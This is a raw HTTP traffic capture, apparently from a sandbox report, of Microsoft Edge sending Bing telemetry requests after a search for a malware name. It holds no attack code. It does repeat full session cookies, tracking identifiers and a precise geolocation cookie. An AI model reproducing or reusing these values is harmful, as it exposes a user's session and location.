
GET /fd/ls/l?BF=MSJ0&IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=[{%22T%22:%22CI.BF%22,%22X%22:0}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:50 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199030.1491370b
GET

https://www.bing.com/wiki?hash=3DA89B68261078C11D1C&order=1%2c2%2c3%2c4%2c5%2c6%2c7&width=608&open=0&accId=TopWikiRichCardV2&appNS=SERP&containsHeroSection=True&bgIndex=17%2c7%2c9%2c12%2c16%2c1%2c3&sectionLines=7%2c8%2c5%2c8%2c5%2c5%2c5&answerID=5882&DataSource=DefaultProd&iid=SERP.5882&ig=B7E570A9AE8C45A28F4A27F1C0C7A0D7

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /wiki?hash=3DA89B68261078C11D1C&order=1%2c2%2c3%2c4%2c5%2c6%2c7&width=608&open=0&accId=TopWikiRichCardV2&appNS=SERP&containsHeroSection=True&bgIndex=17%2c7%2c9%2c12%2c16%2c1%2c3&sectionLines=7%2c8%2c5%2c8%2c5%2c5%2c5&answerID=5882&DataSource=DefaultProd&iid=SERP.5882&ig=B7E570A9AE8C45A28F4A27F1C0C7A0D7 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:51 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199031.1491394a
GET

https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22thumb_tum24%22}]

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22thumb_tum24%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:51 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199031.1491394b
GET

https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22thumb_f24%22}]

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22thumb_f24%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:51 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199031.1491397c
GET

https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22thumb_tum10%22}]

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22thumb_tum10%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:51 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199031.149139c6
GET

https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22thumb_f10%22}]

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22thumb_f10%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:51 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199031.14913a62
GET

https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22sb_feedback%22}]

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22sb_feedback%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:51 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199031.14913a64
POST

https://www.bing.com/fd/ls/lsp.aspx?

msedge.exe

Remote address:

92.123.128.172:443

Request

POST /fd/ls/lsp.aspx? HTTP/2.0
host: www.bing.com
content-length: 264
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain;charset=UTF-8
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
